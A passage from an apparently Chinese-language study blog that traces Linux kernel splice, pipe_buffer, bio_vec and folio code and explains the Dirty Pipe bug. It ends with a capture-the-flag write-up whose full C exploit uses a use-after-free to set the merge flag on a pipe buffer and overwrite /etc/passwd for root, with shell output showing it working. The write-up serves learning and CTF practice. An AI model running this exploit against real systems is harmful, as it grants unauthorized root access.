flags) { struct pipe_inode_info *ipipe; struct pipe_inode_info *opipe; loff_t offset; ssize_t ret; if (unlikely(!(in->f_mode & FMODE_READ) || !(out->f_mode & FMODE_WRITE))) return -EBADF; ipipe = get_pipe_info(in, true); opipe = get_pipe_info(out, true); ``` 接下來是三種 case ### pipe 2 pipe 第一種 pipe 2 pipe 會先確定都沒有指定 offset,以及不是自己複製給自己 之後 call `splice_pipe_to_pipe` ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L1314 if (ipipe && opipe) { if (off_in || off_out) return -ESPIPE; /* Splicing to self would be fun, but... */ if (ipipe == opipe) return -EINVAL; if ((in->f_flags | out->f_flags) & O_NONBLOCK) flags |= SPLICE_F_NONBLOCK; ret = splice_pipe_to_pipe(ipipe, opipe, len, flags); } ``` 去初始化 i/o pipe_buffer、head、tail 等變數後 去 call `ipipe_prep`, 主要用來確保來源 pipe 有資料可讀,如果沒有就依情況等待 (阻塞模式) 或返回錯誤 並避免死鎖狀況 ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L1715 /* * Splice contents of ipipe to opipe. */ static int splice_pipe_to_pipe(struct pipe_inode_info *ipipe, struct pipe_inode_info *opipe, size_t len, unsigned int flags) { struct pipe_buffer *ibuf, *obuf; unsigned int i_head, o_head; unsigned int i_tail, o_tail; int ret = 0; bool input_wakeup = false; retry: ret = ipipe_prep(ipipe, flags); if (ret) return ret; ret = opipe_prep(opipe, flags); if (ret) return ret; /* * Potential ABBA deadlock, work around it by ordering lock * grabbing by pipe info address. Otherwise two different processes * could deadlock (one doing tee from A -> B, the other from B -> A). */ pipe_double_lock(ipipe, opipe); i_tail = ipipe->tail; o_head = opipe->head; ``` 之後去檢查 readers、writers、對應 pipe 是不是 empty 或 full 狀態 非阻塞跟阻塞 (SPLICE_F_NONBLOCK) 基本上就是會直接跳出還是等待 ```c do { size_t o_len; if (!opipe->readers) { send_sig(SIGPIPE, current, 0); if (!ret) ret = -EPIPE; break; } i_head = ipipe->head; o_tail = opipe->tail; if (pipe_empty(i_head, i_tail) && !ipipe->writers) break; /* * Cannot make any progress, because either the input * pipe is empty or the output pipe is full. */ if (pipe_empty(i_head, i_tail) || pipe_full(o_head, o_tail, opipe->max_usage)) { /* Already processed some buffers, break */ if (ret) break; if (flags & SPLICE_F_NONBLOCK) { ret = -EAGAIN; break; } /* * We raced with another reader/writer and haven't * managed to process any buffers. A zero return * value means EOF, so retry instead. */ pipe_unlock(ipipe); pipe_unlock(opipe); goto retry; } ``` 通過 pipe_buf 拿到對應 pipe tail (in) 跟 head (out) 的 pipe_buffer 如果指定的 len 大於 in 的 len 那就直接 copy 整個 struct 過去 之後去清空 ibuf ops 以及將 out pipe 的 head 後推 (下一個寫入 pipe_buffer 位置) 另外一個就需要部份 copy 不過邏輯差不多 ```c ibuf = pipe_buf(ipipe, i_tail); obuf = pipe_buf(opipe, o_head); if (len >= ibuf->len) { /* * Simply move the whole buffer from ipipe to opipe */ *obuf = *ibuf; ibuf->ops = NULL; i_tail++; ipipe->tail = i_tail; input_wakeup = true; o_len = obuf->len; o_head++; opipe->head = o_head; } else { /* * Get a reference to this pipe buffer, * so we can copy the contents over. */ if (!pipe_buf_get(ipipe, ibuf)) { if (ret == 0) ret = -EFAULT; break; } *obuf = *ibuf; /* * Don't inherit the gift and merge flags, we need to * prevent multiple steals of this page. */ obuf->flags &= ~PIPE_BUF_FLAG_GIFT; obuf->flags &= ~PIPE_BUF_FLAG_CAN_MERGE; obuf->len = len; ibuf->offset += len; ibuf->len -= len; o_len = len; o_head++; opipe->head = o_head; } ret += o_len; len -= o_len; } while (len); ``` ### pipe 2 file 這部分檢查跟先前邏輯相同 另外會去 call `rw_verify_area` 來驗證檔案的權限 最後 call `do_splice_from` ```c } else if (ipipe) { if (off_in) return -ESPIPE; if (off_out) { if (!(out->f_mode & FMODE_PWRITE)) return -EINVAL; offset = *off_out; } else { offset = out->f_pos; } if (unlikely(out->f_flags & O_APPEND)) return -EINVAL; ret = rw_verify_area(WRITE, out, &offset, len); if (unlikely(ret < 0)) return ret; if (in->f_flags & O_NONBLOCK) flags |= SPLICE_F_NONBLOCK; file_start_write(out); ret = do_splice_from(ipipe, out, &offset, len, flags); file_end_write(out); if (!off_out) out->f_pos = offset; else *off_out = offset; ``` 之後去 call out normal file 的 `splice_write` (寫在 file ops [src](https://elixir.bootlin.com/linux/v6.15.9/source/block/fops.c#L900)) splice_write 會 call 到 `iter_file_splice_write` ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L930 /* * Attempt to initiate a splice from pipe to file. */ static ssize_t do_splice_from(struct pipe_inode_info *pipe, struct file *out, loff_t *ppos, size_t len, unsigned int flags) { if (unlikely(!out->f_op->splice_write)) return warn_unsupported(out, "write"); return out->f_op->splice_write(pipe, out, ppos, len, flags); } ``` ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L648 /** * iter_file_splice_write - splice data from a pipe to a file * @pipe: pipe info (in) * @out: file to write to * @ppos: position in @out * @len: number of bytes to splice * @flags: splice modifier flags * * Description: * Will either move or copy pages (determined by @flags options) from * the given pipe inode to the given file. * This one is ->write_iter-based. * */ ssize_t iter_file_splice_write(struct pipe_inode_info *pipe, struct file *out, loff_t *ppos, size_t len, unsigned int flags) { struct splice_desc sd = { .total_len = len, .flags = flags, .pos = *ppos, .u.file = out, }; int nbufs = pipe->max_usage; struct bio_vec *array; ssize_t ret; ``` splice_desc 是用來追蹤 splice 過程的狀態 * total_len:剩下要寫入的資料長度 * num_spliced:已經成功寫入的資料 * pos:檔案偏移位置 * need_wakeup:是否需要喚醒管道的其他等待者 之後去 kcalloc max 數量個 bio_vec 並給 pipe 上鎖 ```c if (!out->f_op->write_iter) return -EINVAL; array = kcalloc(nbufs, sizeof(struct bio_vec), GFP_KERNEL); if (unlikely(!array)) return -ENOMEM; pipe_lock(pipe); ``` struct bio_vec,它是 I/O 子系統用來描述一段連續物理記憶體區間(contiguous physical memory range)的資料結構 * bv_page 指向 page * bv_len 是這個區段的實際長度 * bv_offset 是資料在 bv_page 內的起始位置,資料不是從 page 開頭開始,就用 offset 指定 https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/bvec.h#L19 ```c /** * struct bio_vec - a contiguous range of physical memory addresses * @bv_page: First page associated with the address range. * @bv_len: Number of bytes in the address range. * @bv_offset: Start of the address range relative to the start of @bv_page. * * The following holds for a bvec if n * PAGE_SIZE < bv_offset + bv_len: * * nth_page(@bv_page, n) == @bv_page + n * * This holds because page_is_mergeable() checks the above property. */ struct bio_vec { struct page *bv_page; unsigned int bv_len; unsigned int bv_offset; }; ``` 去初始化 sd (計數器跟狀態) ```c splice_from_pipe_begin(&sd); ``` `splice_from_pipe_next` 去確保 pipe 中有資料可以被 splice,並處理等待或非阻塞邏輯 並且這裡也去動態的 kcalloc bio_vec 確保一開始分配不夠(? ```c while (sd.total_len) { struct kiocb kiocb; struct iov_iter from; unsigned int head, tail; size_t left; int n; ret = splice_from_pipe_next(pipe, &sd); if (ret <= 0) break; if (unlikely(nbufs < pipe->max_usage)) { kfree(array); nbufs = pipe->max_usage; array = kcalloc(nbufs, sizeof(struct bio_vec), GFP_KERNEL); if (!array) { ret = -ENOMEM; break; } } ``` 之後根據要轉移的長度,去建立 bio_vec 這邊動態去加 tail 直到與 head 重疊 (讀出所有的資料) 或是讀到指定的大小了 ```c /* build the vector */ left = sd.total_len; for (n = 0; !pipe_empty(head, tail) && left && n < nbufs; tail++) { struct pipe_buffer *buf = pipe_buf(pipe, tail); size_t this_len = buf->len; /* zero-length bvecs are not supported, skip them */ if (!this_len) continue; this_len = min(this_len, left); ret = pipe_buf_confirm(pipe, buf); if (unlikely(ret)) { if (ret == -ENODATA) ret = 0; goto done; } bvec_set_page(&array[n], buf->page, this_len, buf->offset); left -= this_len; n++; } // https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/bvec.h#L37 /** * bvec_set_page - initialize a bvec based off a struct page * @bv: bvec to initialize * @page: page the bvec should point to * @len: length of the bvec * @offset: offset into the page */ static inline void bvec_set_page(struct bio_vec *bv, struct page *page, unsigned int len, unsigned int offset) { bv->bv_page = page; bv->bv_len = len; bv->bv_offset = offset; } ``` 之後去將 bio_vec 陣列轉成 iov_iter,方便統一呼叫 write_iter 寫入檔案 另外也初始化 kiocb (out 寫入位置的 kiocb) ```c iov_iter_bvec(&from, ITER_SOURCE, array, n, sd.total_len - left); init_sync_kiocb(&kiocb, out); kiocb.ki_pos = sd.pos; ``` 通過 write_iter 來去從 bvec 寫入到 kiocb 之後去更新 splice 當前已經寫入的位置 ```c ret = out->f_op->write_iter(&kiocb, &from); sd.pos = kiocb.ki_pos; ``` 之後動態去調整整個 pipe 狀態跟釋放 ```c if (ret <= 0) break; sd.num_spliced += ret; sd.total_len -= ret; *ppos = sd.pos; /* dismiss the fully eaten buffers, adjust the partial one */ tail = pipe->tail; while (ret) { struct pipe_buffer *buf = pipe_buf(pipe, tail); if (ret >= buf->len) { ret -= buf->len; buf->len = 0; pipe_buf_release(pipe, buf); tail++; pipe->tail = tail; if (pipe->files) sd.need_wakeup = true; } else { buf->offset += ret; buf->len -= ret; ret = 0; } } } done: kfree(array); splice_from_pipe_end(pipe, &sd); pipe_unlock(pipe); if (sd.num_spliced) ret = sd.num_spliced; return ret; ``` ### file 2 pipe 與先前驗證差不多 最後 call `splice_file_to_pipe` ```c } else if (opipe) { if (off_out) return -ESPIPE; if (off_in) { if (!(in->f_mode & FMODE_PREAD)) return -EINVAL; offset = *off_in; } else { offset = in->f_pos; } ret = rw_verify_area(READ, in, &offset, len); if (unlikely(ret < 0)) return ret; if (out->f_flags & O_NONBLOCK) flags |= SPLICE_F_NONBLOCK; ret = splice_file_to_pipe(in, opipe, &offset, len, flags); if (!off_in) in->f_pos = offset; else *off_in = offset; ``` 首先先上鎖,並確保 out pipe 有足夠空間 之後去 call `do_splice_read` ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L1279 ssize_t splice_file_to_pipe(struct file *in, struct pipe_inode_info *opipe, loff_t *offset, size_t len, unsigned int flags) { ssize_t ret; pipe_lock(opipe); ret = wait_for_space(opipe, flags); if (!ret) ret = do_splice_read(in, offset, opipe, len, flags); pipe_unlock(opipe); if (ret > 0) wakeup_pipe_readers(opipe); return ret; } ``` * in → 來源檔案。 * ppos → 檔案偏移量。 * pipe → 目標 pipe。 * len → 想要讀的 byte 數。 * flags → splice 標誌(如 SPLICE_F_NONBLOCK) 之後去確認傳入檔案有可讀權限 pipe_buf_usage(pipe) → 計算 pipe 目前佔用的 buffer 數。 p_space → pipe 還能容納的 buffer 數。 不能讀超過 pipe 可容納的空間 一般檔案會走 `splice_read` ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L953 /* * Callers already called rw_verify_area() on the entire range. * No need to call it for sub ranges. */ static ssize_t do_splice_read(struct file *in, loff_t *ppos, struct pipe_inode_info *pipe, size_t len, unsigned int flags) { unsigned int p_space; if (unlikely(!(in->f_mode & FMODE_READ))) return -EBADF; if (!len) return 0; /* Don't try to read more the pipe has space for. */ p_space = pipe->max_usage - pipe_buf_usage(pipe); len = min_t(size_t, len, p_space << PAGE_SHIFT); if (unlikely(len > MAX_RW_COUNT)) len = MAX_RW_COUNT; if (unlikely(!in->f_op->splice_read)) return warn_unsupported(in, "read"); /* * O_DIRECT and DAX don't deal with the pagecache, so we allocate a * buffer, copy into it and splice that into the pipe. */ if ((in->f_flags & O_DIRECT) || IS_DAX(in->f_mapping->host)) return copy_splice_read(in, ppos, pipe, len, flags); return in->f_op->splice_read(in, ppos, pipe, len, flags); } ``` fop 的 `splice_read` 會 call 到 `filemap_splice_read` 看到很多文章說會 call 到 `generic_file_splice_read()` ,但這份 patch 改成了 call `filemap_splice_read` https://lkml.indiana.edu/2305.2/05830.html https://git.sceen.net/linux/linux-stable.git/commit/fs/ufs?h=v5.7-rc7&id=2cb1e08985e3dc59d0a4ebf770a87e3e2410d985 ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/read_write.c#L28 const struct file_operations generic_ro_fops = { .llseek = generic_file_llseek, .read_iter = generic_file_read_iter, .mmap = generic_file_readonly_mmap, .splice_read = filemap_splice_read, }; ``` 初始化變數後 去將 in init 到 iocb 內 先計算 pipe 還能放幾頁,再把讀取長度 len 限制在這個可用容量之內 之後去 init folio_batch ```c // https://elixir.bootlin.com/linux/v6.15.9/source/mm/filemap.c#L2939 /** * filemap_splice_read - Splice data from a file's pagecache into a pipe * @in: The file to read from * @ppos: Pointer to the file position to read from * @pipe: The pipe to splice into * @len: The amount to splice * @flags: The SPLICE_F_* flags * * This function gets folios from a file's pagecache and splices them into the * pipe. Readahead will be called as necessary to fill more folios. This may * be used for blockdevs also. * * Return: On success, the number of bytes read will be returned and *@ppos * will be updated if appropriate; 0 will be returned if there is no more data * to be read; -EAGAIN will be returned if the pipe had no space, and some * other negative error code will be returned on error. A short read may occur * if the pipe has insufficient space, we reach the end of the data or we hit a * hole. */ ssize_t filemap_splice_read(struct file *in, loff_t *ppos, struct pipe_inode_info *pipe, size_t len, unsigned int flags) { struct folio_batch fbatch; struct kiocb iocb; size_t total_spliced = 0, used, npages; loff_t isize, end_offset; bool writably_mapped; int i, error = 0; if (unlikely(*ppos >= in->f_mapping->host->i_sb->s_maxbytes)) return 0; init_sync_kiocb(&iocb, in); iocb.ki_pos = *ppos; /* Work out how much data we can actually add into the pipe */ used = pipe_buf_usage(pipe); npages = max_t(ssize_t, pipe->max_usage - used, 0); len = min_t(size_t, len, npages * PAGE_SIZE); folio_batch_init(&fbatch); ``` folio_batch 是一個描述一群 folio 的結構 folio 代表一段連續的 page cache 記憶體 (最少一個 page) ```c // https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/pagevec.h#L19 /** * struct folio_batch - A collection of folios. * * The folio_batch is used to amortise the cost of retrieving and * operating on a set of folios. The order of folios in the batch may be * significant (eg delete_from_page_cache_batch()). Some users of the * folio_batch store "exceptional" entries in it which can be removed * by calling folio_batch_remove_exceptionals(). */ struct folio_batch { unsigned char nr; unsigned char i; bool percpu_pvec_drained; struct folio *folios[PAGEVEC_SIZE]; }; ``` 設定 iocb.ki_pos,告訴要從檔案的哪個位置開始取資料 `filemap_get_pages()` 會去 file page 把對應 offset 的資料取出,之後將檔案的 pages 填入到 folio_batch 中 flio ```c do { cond_resched(); if (*ppos >= i_size_read(in->f_mapping->host)) break; iocb.ki_pos = *ppos; error = filemap_get_pages(&iocb, len, &fbatch, true); if (error < 0) break; ``` 這段的重點應該是去從 folio 中讀取資料 (`splice_folio_into_pipe`) ```c /* * i_size must be checked after we know the pages are Uptodate. * * Checking i_size after the check allows us to calculate * the correct value for "nr", which means the zero-filled * part of the page is not copied back to userspace (unless * another truncate extends the file - this is desired though). */ isize = i_size_read(in->f_mapping->host); if (unlikely(*ppos >= isize)) break; end_offset = min_t(loff_t, isize, *ppos + len); /* * Once we start copying data, we don't want to be touching any * cachelines that might be contended: */ writably_mapped = mapping_writably_mapped(in->f_mapping); for (i = 0; i < folio_batch_count(&fbatch); i++) { struct folio *folio = fbatch.folios[i]; size_t n; if (folio_pos(folio) >= end_offset) goto out; folio_mark_accessed(folio); /* * If users can be writing to this folio using arbitrary * virtual addresses, take care of potential aliasing * before reading the folio on the kernel side. */ if (writably_mapped) flush_dcache_folio(folio); n = min_t(loff_t, len, isize - *ppos); n = splice_folio_into_pipe(pipe, folio, *ppos, n); if (!n) goto out; len -= n; total_spliced += n; *ppos += n; in->f_ra.prev_pos = *ppos; if (pipe_is_full(pipe)) goto out; } folio_batch_release(&fbatch); } while (len); ``` 稍微釐清一下 file 的資料通過 filemap_get_pages 寫入到 folio_batch 的 folio 中 這裡將 folio 所有的 page 讀出來放到 pipe_buffer 中 就達成了將 file 中的資料 copy 到 pipe 中 (pipe object 與 file object 共用 struct page) 這部分我認為站在 `struct page` 角度來看,就是把 file 轉移到 folio 轉移到 pipe_buffer 中 這部分的 pipe_buffer 通過 `.key = value` 方式會去初始化了 flags 成 0,因此這部分目前沒有 dirty pipe 問題 (或許哪天這裡機制被改或有新的 patch 可以看看有沒有出問題) ```c // https://elixir.bootlin.com/linux/v6.15.9/source/mm/filemap.c#L2909 /* * Splice subpages from a folio into a pipe. */ size_t splice_folio_into_pipe(struct pipe_inode_info *pipe, struct folio *folio, loff_t fpos, size_t size) { struct page *page; size_t spliced = 0, offset = offset_in_folio(folio, fpos); page = folio_page(folio, offset / PAGE_SIZE); size = min(size, folio_size(folio) - offset); offset %= PAGE_SIZE; while (spliced < size && !pipe_is_full(pipe)) { struct pipe_buffer *buf = pipe_head_buf(pipe); size_t part = min_t(size_t, PAGE_SIZE - offset, size - spliced); *buf = (struct pipe_buffer) { .ops = &page_cache_pipe_buf_ops, .page = page, .offset = offset, .len = part, }; folio_get(folio); pipe->head++; page++; spliced += part; offset = 0; } return spliced; } ``` 最後將 folio_batch 釋放掉 ```c out: folio_batch_release(&fbatch); file_accessed(in); return total_spliced ? total_spliced : error; } EXPORT_SYMBOL(filemap_splice_read); ``` 其他值被清空可以跑這個觀察 ```c #include <stdio.h> #include <stddef.h> struct Test_buf { int a; int b; int c; int d; }; int main() { struct Test_buf buf; buf.d = 123; buf = (struct Test_buf){ .a = 42, .b = 99 }; printf("a = %d\n", buf.a); printf("b = %d\n", buf.b); printf("c = %d\n", buf.c); printf("d = %d\n", buf.d); return 0; } ``` ## bio_vec 這邊來細講一下有關 bio_vec (上面只是簡單敘述而已) bio_vec 最基本的結構如下,一個 bio_vec 管理一個 page 一部分或是整個 一群 bio_vec 組成了 bio 用於表示請求的 I/O 段落可能有很多個 ```c // https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/bvec.h#L19 /** * struct bio_vec - a contiguous range of physical memory addresses * @bv_page: First page associated with the address range. * @bv_len: Number of bytes in the address range. * @bv_offset: Start of the address range relative to the start of @bv_page. * * The following holds for a bvec if n * PAGE_SIZE < bv_offset + bv_len: * * nth_page(@bv_page, n) == @bv_page + n * * This holds because page_is_mergeable() checks the above property. */ struct bio_vec { struct page *bv_page; unsigned int bv_len; unsigned int bv_offset; }; ``` 整個 bio 長如下這樣 一個 bio 代表一次 完整的 block I/O 請求,而每個 bio_vec 是此請求的一個實體記憶體片段 ```c // https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/blk_types.h#L214 /* * main unit of I/O for the block layer and lower layers (ie drivers and * stacking drivers) */ struct bio { struct bio *bi_next; /* request queue link */ struct block_device *bi_bdev; blk_opf_t bi_opf; /* bottom bits REQ_OP, top bits * req_flags. */ unsigned short bi_flags; /* BIO_* below */ unsigned short bi_ioprio; enum rw_hint bi_write_hint; blk_status_t bi_status; atomic_t __bi_remaining; struct bvec_iter bi_iter; union { /* for polled bios: */ blk_qc_t bi_cookie; /* for plugged zoned writes only: */ unsigned int __bi_nr_segments; }; bio_end_io_t *bi_end_io; void *bi_private; #ifdef CONFIG_BLK_CGROUP /* * Represents the association of the css and request_queue for the bio. * If a bio goes direct to device, it will not have a blkg as it will * not have a request_queue associated with it. The reference is put * on release of the bio. */ struct blkcg_gq *bi_blkg; struct bio_issue bi_issue; #ifdef CONFIG_BLK_CGROUP_IOCOST u64 bi_iocost_cost; #endif #endif #ifdef CONFIG_BLK_INLINE_ENCRYPTION struct bio_crypt_ctx *bi_crypt_context; #endif #if defined(CONFIG_BLK_DEV_INTEGRITY) struct bio_integrity_payload *bi_integrity; /* data integrity */ #endif unsigned short bi_vcnt; /* how many bio_vec's */ /* * Everything starting with bi_max_vecs will be preserved by bio_reset() */ unsigned short bi_max_vecs; /* max bvl_vecs we can hold */ atomic_t __bi_cnt; /* pin count */ struct bio_vec *bi_io_vec; /* the actual vec list */ struct bio_set *bi_pool; /* * We can inline a number of vecs at the end of the bio, to avoid * double allocations for a small number of bio_vecs. This member * MUST obviously be kept at the very end of the bio. */ struct bio_vec bi_inline_vecs[]; }; ``` 上面使用 bio_vec 這個結構體,應該是與 pipe_buffer 長相很像 ## folio https://blog.csdn.net/feelabclihu/article/details/131485936 ## Dirty pipe 正如先前所說的 若沒有在 splice file2pipe 的時候去初始化 flags 就會出問題 原因如下 嘗試先隨便用 `write` 寫入東西到 pipe 中,此時結束後會被設置 `PIPE_BUF_FLAG_CAN_MERGE` 這件事我們先記著 另外來看看 file2pipe file 的 struct page 最後會跟 pipe_buffer 共享 此時思考一件事 如果在 file2pipe 沒有去初始化 flags 會發生甚麼事 那不就會當你去 write 一個 struct page 與 file 共享的 pipe 的時候 因為 `PIPE_BUF_FLAG_CAN_MERGE` 被設置,可以去寫到前一個 page (與 file 共享),也就可以繞過檔案權限檢查,向 read only 寫入資料 (因為需要預先 write 一個東西到 pipe,此時會改變他的 offset,導致第一個 byte 無法改動,不過也夠用來提權了 額外可以參考 https://dirtypipe.cm4all.com/ ## Dirty Pipe challenge https://github.com/r1ru/linux-kernel-exploitation/tree/main/dirty-pipe ### analyze source code 他去創建了一個 `vuln` 的 device 並提供了四個功能的 ioctl ```c static long module_ioctl(struct file *file, unsigned int cmd, unsigned long arg) { request_t req; long ret; if (copy_from_user(&req, (void *)arg, sizeof(req)) != 0) { return -1; } mutex_lock(&module_lock); switch(cmd) { case CMD_ALLOC: ret = obj_alloc(); break; case CMD_READ: ret = obj_read(req.data, req.size); break; case CMD_WRITE: ret = obj_write(req.data, req.size); break; case CMD_FREE: ret = obj_free(); break; default: ret = -1; break; } mutex_unlock(&module_lock); return ret; } static struct file_operations module_fops = { .unlocked_ioctl = module_ioctl, }; static struct miscdevice vuln_dev = { .minor = MISC_DYNAMIC_MINOR, .name = "vuln", .fops = &module_fops }; static int __init module_initialize(void) { if (misc_register(&vuln_dev) != 0) { return -1; } return 0; } static void __exit module_cleanup(void) { misc_deregister(&vuln_dev); mutex_destroy(&module_lock); } ``` 這部分實現了 ioctl 其中固定會去 kzalloc 一塊 0x400 大小的 object 來用 (kmalloc-1k) 其中 free 的地方沒有去清空 pointer 所以有 UAF ```c #define CMD_ALLOC 0xf000 #define CMD_READ 0xf001 #define CMD_WRITE 0xf002 #define CMD_FREE 0xf003 #define OBJ_SIZE 0x400 typedef struct { size_t size; char *data; } request_t; struct obj { char buf[OBJ_SIZE]; }; static struct obj *obj = NULL; static DEFINE_MUTEX(module_lock); static long obj_alloc(void) { if (obj != NULL) { return -1; } obj = kzalloc(sizeof(struct obj), GFP_KERNEL); if (obj == NULL) { return -1; } return 0; } static long obj_read(char *data, size_t size) { if (obj == NULL || size > OBJ_SIZE) { return -1; } if (copy_to_user(data, obj->buf, size) != 0) { return -1; } return 0; } static long obj_write(char *data, size_t size) { if (obj == NULL || size > OBJ_SIZE) { return -1; } if (copy_from_user(obj->buf, data, size) != 0) { return -1; } return 0; } static long obj_free(void) { kfree(obj); return 0; } ``` ### attack 先 alloc 後 free 做一塊 UAF chunk 並去 pipe 來讓 pipe_buffer array 拿到這塊 chunk UAF 接著通過 splice 將 `/etc/passwd` 拼接到 pipe fd 中 (他會跟 pipe_buffer 共又 struct page) 通過 UAF read 將資料讀出來,並修改 flags 的地方把 `PIPE_BUF_FLAG_CAN_MERGE` 打開 就可以通過追加寫入,來寫到這個映射到 read only `/etc/passwd` 的 struct page ,重新登入後輸入修改密碼來達到提權 ### exploit ```c #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <sys/ioctl.h> #include <sys/syscall.h> #include <time.h> #include <assert.h> #include <stdint.h> #include <sched.h> #include <unistd.h> #include <sys/mman.h> // gcc exploit.c -o exploit --static -masm=intel #define CMD_ALLOC 0xf000 #define CMD_READ 0xf001 #define CMD_WRITE 0xf002 #define CMD_FREE 0xf003 typedef struct { size_t size; char *data; } request_t; int fd; int etcpasswd_fd; void obj_alloc() { request_t req = {}; ioctl(fd, CMD_ALLOC, &req); } void obj_write(size_t size, char* data) { request_t req = { .size = size, .data = data }; ioctl(fd, CMD_WRITE, &req); } void obj_read(size_t size, char* data) { request_t req = { .size = size, .data = data }; ioctl(fd, CMD_READ, &req); } void obj_free() { request_t req = {}; ioctl(fd, CMD_FREE, &req); } void show_zoneinfo() { FILE *fp = fopen("/proc/zoneinfo", "r"); char line[256]; int in_pagesets = 0; int current_cpu = -1; while (fgets(line, sizeof(line), fp)) { if (strstr(line, "pagesets")) { in_pagesets = 1; continue; } if (in_pagesets && line[0] != ' ' && line[0] != '\t') { in_pagesets = 0; continue; } if (in_pagesets) { int cpu_id; if (sscanf(line, " cpu: %d", &cpu_id) == 1) { current_cpu = cpu_id; } int count_val; if (sscanf(line, " count: %d", &count_val) == 1 && current_cpu != -1) { printf("CPU %d -> count = %d\n", current_cpu, count_val); } } } fclose(fp); } struct pipe_buffer { void *page; unsigned int offset; unsigned int len; const void *ops; unsigned int flags; unsigned long private; }; #define PIPE_BUF_FLAG_CAN_MERGE 0x10 int main(){ fd = open("/dev/vuln", O_RDONLY); if (fd == -1){ puts("Open /dev/vuln failed"); exit(0); } etcpasswd_fd = open("/etc/passwd", O_RDONLY); if (etcpasswd_fd == -1) { puts("Open /etc/passwd failed"); exit(0); } obj_alloc(); obj_free(); int pipefd[2]; // create pipe let pipe buffer have UAF pipe(pipefd); /* ssize_t splice(int fd_in, off_t *_Nullable off_in, int fd_out, off_t *_Nullable off_out, size_t size, unsigned int flags); */ off64_t offset = 0; splice(etcpasswd_fd, &offset, pipefd[1], NULL, 1, 0); struct pipe_buffer my_evil_pipe_buffer; obj_read(sizeof(my_evil_pipe_buffer), (char*)&my_evil_pipe_buffer); printf( "[+] .page = %p, .offset = %#x, .len = %#x, .ops = %p, .flags = %#x, .private = %#lx\n", my_evil_pipe_buffer.page, my_evil_pipe_buffer.offset, my_evil_pipe_buffer.len, my_evil_pipe_buffer.ops, my_evil_pipe_buffer.flags, my_evil_pipe_buffer.private ); /* Overwrite flags and len */ my_evil_pipe_buffer.len = 0; my_evil_pipe_buffer.flags = PIPE_BUF_FLAG_CAN_MERGE; obj_write(sizeof(my_evil_pipe_buffer), (char*)&my_evil_pipe_buffer); obj_read(sizeof(my_evil_pipe_buffer), (char*)&my_evil_pipe_buffer); printf( "[+] .page = %p, .offset = %#x, .len = %#x, .ops = %p, .flags = %#x, .private = %#lx\n", my_evil_pipe_buffer.page, my_evil_pipe_buffer.offset, my_evil_pipe_buffer.len, my_evil_pipe_buffer.ops, my_evil_pipe_buffer.flags, my_evil_pipe_buffer.private ); char payload[] = "root:$1$naup$tZAttOyVXnz7BlRCnYsuv/:0:0:root:/root:/bin/sh"; int ret = write(pipefd[1], payload, sizeof(payload)); if (ret == -1) { puts("Failed to write /etc/passwd"); exit(0); } return 0; } /* ~ $ id uid=1000(ctf) gid=1000 groups=1000 ~ $ ./exploit [+] .page = 0xfffffb04000d4c40, .offset = 0, .len = 0x1, .ops = 0xffffffff8f215320, .flags = 0, .private = 0 [+] .page = 0xfffffb04000d4c40, .offset = 0, .len = 0, .ops = 0xffffffff8f215320, .flags = 0x10, .private = 0 ~ $ cat /etc/passwd root:$1$naup$tZAttOyVXnz7BlRCnYsuv/:0:0:root:/root:/bin/sh:/home/ctf:/bin/sh ~ $ su Password: / # id uid=0(root) gid=0(root) groups=0(root) */ ``` ## pagejack https://i.blackhat.com/BH-US-24/Presentations/US24-Qian-PageJack-A-Powerful-Exploit-Technique-With-Page-Level-UAF-Thursday.pdf ## after all 再次感受到 kernel 裡面記憶體 1 bit 改變都會有很大的影響XD ## others https://www.interruptlabs.co.uk/articles/pipe-buffer